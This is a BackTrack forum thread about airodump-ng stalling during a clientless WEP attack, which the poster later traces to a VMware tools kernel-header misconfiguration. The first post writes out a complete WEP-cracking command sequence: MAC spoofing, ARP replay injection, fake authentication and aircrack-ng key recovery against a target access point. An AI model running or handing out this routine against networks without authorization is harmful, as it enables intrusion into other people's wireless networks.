Results 1 to 2 of 2

Thread: Airodump-ng stops working as soon as Arpís are pick by Aireplay-ng

  1. #1
    Just burned their ISO
    Join Date
    Jul 2010
    Posts
    23

    Default Airodump-ng stops working as soon as Arpís are pick by Aireplay-ng

    Running clientless WEP Attack on BT5R1 and BT5, Airodump-ng stops working Ė the Beacons, Pwr and Rxq counts stops. Ė And whatever itís on Airodump-ng, start to go away leaving only the line of the target AP


    I am running BT5R1-KDE-32 on VMWare workstation, the follow itís the routine I was using before and after
    the problem:

    Plug in the Alfa card AWUS036H

    dmesg |tail -20 Ė to make sure the card its taken by BT5

    rmmod rtl8187
    rfkill block all
    rfkill unblock all
    modprobe rtl8187
    rfkill unblock all
    ifconfig wlan0 up
    ifconfig wlan0 down
    macchanger -Ėmac 00:11:22:33:44:55 wlan0
    airmon-ng start wlan0
    /etc/init.d/networking stop -- (to kill the pid files)

    No errors or flags on any of the steps above

    Launch the process:

    Window 1: airodump-ng -w output -c 1 wlan0

    Window 2: aireplay-ng -3 -x 1000 -n 100000 -b C4:17:FE:YY:YY:YY -e 9XXX -h 00:11:22:33:44:55 wlan0

    Window 3: aireplay-ng -1 0 -e 9XXX -a C4:17:FE:YY:YY:YY -h 00:11:22:33:44:55 wlan0

    Window 4: aircrack-ng -f 4 -m C4:17:FE:YY:YY:YY -n 128 output-01.cap

    Results:

    Window 1: Airodump-ng stops working, the count for Beacons, Pwr and Rxq stops Ė As soon as the ARPís are caught by window 2, Aireplay-ng -3 Ė a minute or two afterwards, everything start to go away from the window 1, airodump-ng, leaving only the target AP line

    The symptom started to happen about a week before the upgrade to BT5R1, on BT5.

    Could be an upgrade of Aircrack-ng suite via Backtrack, prior to the Upgrade to BT5R1?


    Currently running Aircrack-ng v1.1 r1904 on BT5R1

    I had search BT forums and Aircrack-ng forums, for a reason or solution to no avail.

    I have no problems running the same routine for about 3 months before this situation

    Thanks for your help

  2. #2
    Just burned their ISO
    Join Date
    Jul 2010
    Posts
    23

    Default Re: Airodump-ng stops working as soon as Arpís are pick by Aireplay-ng

    I have found the problem, somehow, I had reinstall VMware tools, since i was having some video problems and I did not notice that it did install on the wrong directory:

    Searching for a valid kernel header path...
    Detected the kernel headers of the running kernel at
    "/lib/modules/2.6.39.4/build/include".
    The path "/lib/modules/2.6.39.4/build/include" appears to be a valid path to
    the kernel headers of the running kernel.
    Would you like to change it? [no] no
    Instead of

    The path "/lib/modules/2.6.39.4/build/include" appears to be a valid path to
    the kernel headers of the running kernel.
    Would you like to change it? [no] yes

    What is the location of the directory of C header files that match your running
    kernel? [/lib/modules/2.6.39.4/build/include] /usr/src/linux-headers-2.6.39.4/include
    This solves the problem I was having and everything is back to normal

Similar Threads

  1. Airodump-ng stops working after 2 minutes.
    By Mev69 in forum BackTrack 5 Beginners Section
    Replies: 29
    Last Post: 11-26-2012, 05:27 PM
  2. airodump-ng and aireplay-ng on BT4 stops to work
    By fjecp in forum BackTrack Bugs
    Replies: 4
    Last Post: 04-15-2010, 10:26 AM
  3. Airodump stops working
    By Nyxistis in forum OLD Newbie Area
    Replies: 8
    Last Post: 02-17-2009, 12:08 PM
  4. aireplay stops injection rtl8180
    By mentality in forum OLD BackTrack v2.0 Final
    Replies: 0
    Last Post: 10-06-2007, 03:50 AM
  5. Aireplay stops injecting ?
    By Double_penetration in forum OLD Newbie Area
    Replies: 17
    Last Post: 05-31-2007, 07:38 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •